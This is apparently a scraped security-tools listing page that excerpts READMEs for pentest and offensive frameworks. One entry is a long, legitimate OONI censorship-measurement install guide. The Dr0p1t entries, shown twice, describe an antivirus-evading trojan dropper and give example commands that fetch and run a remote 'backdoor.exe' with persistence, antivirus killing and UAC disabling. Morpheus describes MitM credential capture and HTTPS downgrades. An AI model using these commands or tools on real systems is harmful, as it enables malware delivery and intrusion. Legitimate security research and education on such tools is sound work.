Framework


Hakku Framework – Simple Penetration Testing Framework

Hakku is simple framework that has been made for penetration testing tools. Hakku framework offers simple structure, basic CLI, and useful features for penetration testing tools developing. Hakku is on early stages and may be unstable, so please down…


Operative – The Fingerprint Framework

__ _ ____ ____ ___ _________ _/ /_(_) _____ / __ \/ __ \/ _ \/ ___/ __ `/ __/ / | / / _ \/ /_/ / /_/ / __/ / / /_/ / /_/ /| |/ / __/\____/ .___/\___/_/ \__,_/\__/_/ |___/\___/ /_/ This is a fram…




PyJFuzz – Python JSON Fuzzer

PyJFuzz is a small, extensible and ready-to-use framework used to fuzz JSON inputs , such as mobile endpoint REST API, JSON implementation, Browsers, cli executable and much more. Version 1.1.0 Homepag…



OONI – Open Observatory of Network Interference

OONI, the Open Observatory of Network Interference, is a global observation network which aims is to collect high quality data using open methodologies, using Free and Open Source Software (FL/OSS) to share observations and data about the various types, methods, and amounts of network tampering in the world.
“The Net interprets censorship as damage and routes around it.”
  • John Gilmore; TIME magazine (6 December 1993)
ooniprobe is the first program that users run to probe their network and to collect data for the OONI project. Are you interested in testing your network for signs of surveillance and censorship? Do you want to collect data to share with others, so that you and others may better understand your network? If so, please read this document and we hope ooniprobe will help you to gather network data that will assist you with your endeavors!


Read this before running ooniprobe!
Running ooniprobe is a potentially risky activity. This greatly depends on the jurisdiction in which you are in and which test you are running. It is technically possible for a person observing your internet connection to be aware of the fact that you are running ooniprobe. This means that if running network measurement tests is something considered to be illegal in your country then you could be spotted.
Furthermore, ooniprobe takes no precautions to protect the install target machine from forensics analysis. If the fact that you have installed or used ooni probe is a liability for you, please be aware of this risk.

OONI in 5 minutes
The latest ooniprobe version for Debian and Ubuntu releases can be found in the deb.torproject.org package repository.
On Debian stable (jessie):

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org jessie main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring

On Debian testing:

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org testing main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring

On Debian unstable:

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org unstable main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring

On Ubuntu 16.10 (yakkety), 16.04 (xenial) or 14.04 (trusty):

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org $RELEASE main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring

Note: You’ll need to swap out $RELEASE for either yakkety , xenial or trusty . This will not happen automatically. You will also need to ensure that you have the universe repository enabled. The universe repository is enabled by default in a standard Ubuntu installation but may not be on some minimal on not standard installations.

Installation

Mac OS X
You can install ooniprobe on OSX if you have installed homebrew ( http://mxcl.github.io/homebrew ) with:

brew install ooniprobe


Unix systems (with pip)
Make sure you have installed the following dependencies:

  • build-essential
  • python (>=2.7)
  • python-dev
  • pip
  • libgeoip-dev
  • libdumbnet-dev
  • libpcap-dev
  • libssl-dev
  • libffi-dev
  • tor (>=0.2.5.1 to run all the tor related tests)

Optional dependencies:

  • obfs4proxy

On debian based systems this can generally be done by running:

sudo apt-get install -y build-essential libdumbnet-dev libpcap-dev libgeoip-dev libffi-dev python-dev python-pip tor libssl-dev obfs4proxy

Then you should be able to install ooniprobe by running:

sudo pip install ooniprobe

or install ooniprobe as a user:

pip install ooniprobe


Using ooniprobe
Net test is a set of measurements to assess what kind of internet censorship is occurring.
Decks are collections of ooniprobe nettests with some associated inputs.
Collector is a service used to report the results of measurements.
Test helper is a service used by a probe for successfully performing its measurements.
Bouncer is a service used to discover the addresses of test helpers and collectors.

Configuring ooniprobe
After successfully installing ooniprobe you should be able to access the web UI on your host machine at http://localhost:8842/ .
You should now be presented with the web UI setup wizard where you can read the risks involved with running ooniprobe. Upon answering the quiz correctly you can enable or disable ooniprobe tests, set how you can connect to the measurement’s collector and finally configure your privacy settings.
By default ooniprobe will not include personal identifying information in the test results, nor create a pcap file. This behavior can be personalized.

Run ooniprobe as a service (systemd)
Upon ooniprobe version 2.0.0 there is no need for cronjobs as ooniprobe-agent is responsible for the tasks scheduling.
You can ensure that ooniprobe-agent is always running by installing and enabling the systemd unit ooniprobe.service:

wget https://raw.githubusercontent.com/TheTorProject/ooni-probe/master/scripts/systemd/ooniprobe.service --directory-prefix=/etc/systemd/system
systemctl enable ooniprobe
systemctl start ooniprobe

You should be able to see a similar output if ooniprobe (systemd) service is active and loaded by running systemctl status ooniprobe:

● ooniprobe.service - ooniprobe.service, network interference detection tool
Loaded: loaded (/etc/systemd/system/ooniprobe.service; enabled)
Active: active (running) since Thu 2016-10-20 09:17:42 UTC; 16s ago
Process: 311 ExecStart=/usr/local/bin/ooniprobe-agent start (code=exited, status=0/SUCCESS)
Main PID: 390 (ooniprobe-agent)
CGroup: /system.slice/ooniprobe.service
└─390 /usr/bin/python /usr/local/bin/ooniprobe-agent start


Setting capabilities on your virtualenv python binary
If your distribution supports capabilities you can avoid needing to run OONI as root:

setcap cap_net_admin,cap_net_raw+eip /path/to/your/virtualenv's/python2


Reporting bugs
You can report bugs and issues you find with ooni-probe on The Tor Project issue tracker filing them under the “Ooni” component: https://trac.torproject.org/projects/tor/newticket?component=Ooni .
You can either register an account or use the group account “cypherpunks” with password “writecode”.

Contributing
You can download the code for ooniprobe from the following git repository:

git clone https://github.com/TheTorProject/ooni-probe.git

You should then submit patches for review as pull requests to this github repository:
https://github.com/TheTorProject/ooni-probe
Read this article to learn how to create a pull request on github ( https://help.github.com/articles/creating-a-pull-request ).
If you prefer not to use github (or don’t have an account), you may also submit patches as attachments to tickets.
Be sure to format the patch (given that you are working on a feature branch that is different from master) with:

git format-patch master --stdout > my_first_ooniprobe.patch


Setting up development environment
On Debian based systems a development environment can be setup as follows: (prerequisites include build essentials, python-dev, and tor; for tor see https://www.torproject.org/docs/debian.html.en ):

sudo apt-get install python-pip python-virtualenv virtualenv
sudo apt-get install libgeoip-dev libffi-dev libdumbnet-dev libssl-dev libpcap-dev
git clone https://github.com/TheTorProject/ooni-probe
cd ooni-probe
virtualenv venv

virtualenv venv will create a folder in the current directory which will contain the Python executable files, and a copy of the pip library which you can use to install other packages. To begin using the virtual environment, it needs to be activated:

source venv/bin/activate
pip install -r requirements.txt
pip install -r requirements-dev.txt
python setup.py install
ooniprobe -s # if all went well, lists available tests



Glue – Application Security Automation

Glue is a framework for running a series of tools. Generally, it is intended as a backbone for automating a security analysis pipeline of tools. Recommended Usage For those wishing to run Glue, we recommend using the docker image because …


EaST – Exploits and Security Tools Framework

Pentest framework environment is the basis of IT security specialist’s toolkit. This software is essential as for learning and improving of knowledge in IT systems attacks and for inspections and proactive protection. The need of native comprehensive open source pen test framework with high level of trust existed for a long time. That is why EAST framework was created for native and native friendly IT security markets. EAST is a framework that has all necessary resources for wide range exploits to run, starting from Web to buffer overruns. EAST differs from similar toolkits by its ease of use. Even a beginner can handle it and start to advance in IT security.

Main features:
  • Framework security. Software used for IT security must have a high level of user trust. Easy to check open source Python code realized in EAST. It is used for all parts of the framework and modules. Relative little amount of code eases its verification by any user. No OS changes applied during software installation.
  • Framework maximum simplicity. Archive downloads, main python script start.py launches, which allows exploits start-stop and message traffic. All handled local or remotely via browser.
  • Exploits simplicity of creation and editing. Possibility to edit and add modules and exploits on the fly without restart. Module code body is easy and minimal in terms of amount.
  • Cross-platform + minimal requirements and dependencies. Tests for Windows and Linux. Should function everywhere where Python is installed. Framework contains all dependencies and does not download additional libraries.
  • Full capacity of vanilla pen test framework. In spite of simplicity and “unoverload” the framework has all necessary resources for wide range exploits to run, starting from Web to buffer overruns.
  • Wide enhancement possibilities. Third party developers can create their own open source solutions or participate in EAST development by use of Server-client architecture, message traffic API and support libraries.

Requirements

Usage

git clone https://github.com/C0reL0ader/EaST && cd EaST
python start.py [-p PORT] [--all-interfaces]

Additional resources


Dr0p1t-Framework 1.2 – A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers ?

In short dropper is type of trojans that downloads other malwares and Dr0p1t gives you the chance to create a dropper that bypass most AVs and have some tricks ๐Ÿ˜‰

Features

  • Framework works with Windows and Linux
  • Download executable on target system and execute it silently..
  • The executable size small compared to other droppers generated the same way
  • Self destruct function so that the dropper will kill and delete itself after finishing it work
  • Adding executable after downloading it to startup
  • Adding executable after downloading it to task scheduler ( UAC not matters )
  • Finding and killing the antivirus before running the malware
  • Running a custom ( batch|powershell|vbs ) file you have chosen before running the executable
  • The ability to disable UAC
  • In running powershell scripts it can bypass execution policy
  • Using UPX to compress the dropper after creating it
  • Choose an icon for the dropper after creating it


Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
--upx Use UPX to compress the final file.
--nouac Disable UAC on victim device
--nocompile Tell the framework to not compile the final file.
-i Use icon to the final file. Check icons folder.
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

  • Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x , the recommended version for Python 3 is 3.5.x and don’t use 3.6 because it’s not supported yet by PyInstaller

  • Python libraries requirements in requirements.txt

Needed dependencies for linux

  • Wine
  • Python 2.7 on Wine Machine

Note : You must have root access

Installation
if you are on linux and do

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible 

Tested on:

  • Kali Linux – SANA
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Changelog v1.2

  • Pyinstaller compiling in Linux using wine
  • Pyinstaller compiling in Windows will not use UPX and that will fix the compiling in windows
  • Added the ability to disable and bypass UAC
  • Updated the antivirus list in the antivirus killer
  • Added SelfDestruct function so that the dropper will kill and delete itself after finishing it work :smile:
  • Full framework rewrite and recheck to fix errors, typos and replacing some libraries to make the size of the final file smaller
  • Started working in some SE tricks to fool the user and there’s a lot of good options in the way ๐Ÿ˜‰ Stay Tuned

Contact


Stitch – Python Remote Administration Tool (RAT)

This is a cross platform python framework which allows you to build custom payloads for Windows, Mac OSX and Linux as well. You are able to select whether the payload binds to a specific IP and port, listens for a connection on a port, option to send a…


TheFatRat v1.8 – Easy Tool For Generate Backdoor with Msfvenom

What is TheFatRat ?? An easy tool to generate backdoor with msfvenom (a part from metasploit framework) and easy tool to post exploitation attack like browser attack,dll . This tool compiles a malware with popular payload and then the compiled malwar…


Dr0p1t-Framework – A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers ? you can read about them from here .
Dr0p1t let you create dropper like any tool but this time FUD with some tricks ๐Ÿ˜‰

Features

  • Works with Windows and Linux
  • Adding malware after downloading it to startup
  • Adding malware after downloading it to task scheduler
  • Finding and killing the antivirus before running the malware
  • Running a custom (batch|powershell|vbs) file you have choosen before running the malware
  • In running powershell scripts it can bypass execution policy
  • Using UPX to compress the dropper after creating it
  • Choose an icon for the dropper after creating it


Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
--upx Use UPX to compress the final file.
-i Use icon to the final file. Check icons folder.
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1

Prerequisites

  • Python 3.x( prefered 3.5 )
  • Python libraries requirements in requirements.txt

Installation
First download it by

git clone https://github.com/D4Vinci/Dr0p1t-Framework

if you are on linux and do

cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on windows download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable unicodes in windows which will make coloring possible 

Todo

  • Python 2 support
  • Work on UAC bypass
  • Work on spreading on device and may be in lan too
  • Injecting dr0pp3r to another program
  • More modules


PoshC2 – Powershell C2 Server and Implants

PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. The tools and modules were developed off the back of our successful PowerShell sessions and paylo…


Morpheus – Automated Ettercap TCP/IP Hijacking Tool

Morpheus framework automates tcp/udp packet manipulation tasks by using etter filters to manipulate target requests/responses under MitM attacks replacing the tcp/udp packet contents by our contents befor forward the packet back to the target host…

workflow:
1º – attacker -> arp poison local lan (mitm)
2º – target   -> requests webpage from network (wan)
3º – attacker -> modifies webpage response (contents)
4º – attacker -> modified packet its forward back to target host
morpheus ships with some pre-configurated filters but it will allow users to improve them when lunching the attack (morpheus scripting console). In the end of the attack morpheus will revert the filter back to is default stage, this will allow users to improve filters at running time without the fear of messing with filter command syntax and spoil the filter.
“Perfect for scripting fans to safely test new concepts”…

What can we acomplish by using filters?

morpheus ships with a collection of etter filters writen be me to acomplish various tasks: replacing images in webpages, replace text in webpages, inject payloads using html <form> tag, denial-of-service attacks (drop,kill packets from source), https/ssh downgrade attacks, redirect target browser traffic to another domain and gives you the ability to build compile your filter from scratch and lunch it through morpheus framework (option W).

“filters can be extended using browser languages like: javascript,css,flash,etc”…

In this example we are using ” HTML tag” to inject an rediretion url in target request morpheus v1.6-Alpha In this example we are using ‘CSS3’ to trigger webpage 180º rotation morpheus v1.6-Alpha

Framework limitations

1º – morpheus will fail if target system its protected againt arp poison atacks
2º – downgrade attacks will fail if browser target as installed only-https addon’s
3º – target system sometimes needs to clear netcache for arp poison to be effective
4º – many attacks described in morpheus may be droped by target HSTS detection sys.

5º – incorrect number of token (///) in TARGET !! morpheus v1.6-Alpha   

morpheus by default will run ettercap using IPv6 (USE_IPV6=ACTIVE) like its previous
configurated into the ‘settings’ file, if you are reciving this error edit settings
file befor runing morpheus and set (USE_IPV6=DISABLED) to force ettercap to use IPV4

6º – morpheus needs ettercap to be executed with higth privileges (uid 0 | gid 0). morpheus v1.6-Alpha
correct ettercap configuration display (running as Admin without ssl disectors active) morpheus v1.6-Alpha

By default morpheus (at startup) will replace the original etter.conf/etter.dns files provided by ettercap, at framework exit morpheus will revert files to is original state..

Dependencies

ettercap, nmap, apache2, zenity

Framework option 1 [firewall] screenshots

firewall [option 1] pre-configurated filter will capture credentials from the follow services:
http,ftp,ssh,telnet (facebook uses https/ssl :( ) report suspicious connections, report common
websocial browsing (facebook,twitter,youtube), report the existence of botnet connections like:
Mocbot IRC Bot, Darkcomet, redirect browser traffic and allow users to block connections (drop,kill)
"Remmenber: morpheus gives is users the ability to 'add more rules' to filters befor execution"

[morpheus] host:192.168.1.67 [ -> ] port:23 telnet ☆
Source ip addr flow destination rank good

[morpheus] host:192.168.1.67 [ <- ] port:23 telnet ☠
Destination ip flow source port rank suspicious

morpheus v1.6-Alpha
morpheus v1.6-Alpha
morpheus v1.6-Alpha
morpheus v1.6-Alpha
morpheus v1.6-Alpha
morpheus v1.6-Alpha
morpheus v1.6-Alpha
morpheus v1.6-Alpha

Basically firewall filter will act like one offensive and defensive tool analyzing the
tcp/udp data flow to report logins,suspicious traffic,brute-force,block target ip,etc.



RogueSploit – Powerfull social engeering Wi-Fi trap!

RogueSploit is an open source automated script made to create a Fake Acces Point, with dhcpd server, dns spoofing, host redirection, browser_autopwn1 or autopwn2 or beef+mitmf.TO DO LIST: Add BeEF;[DONE] Add MITMF;[DONE] …


dedsploit – Framework For Attacking Network Protocols

Framework for attacking network protocols and network exploitation. I. Introduction I don’t look back anymore. I don’t regret. I look forward Aiden Pearce Yes, Watch Dogs has heavily influenced us when writing this framework. This entire…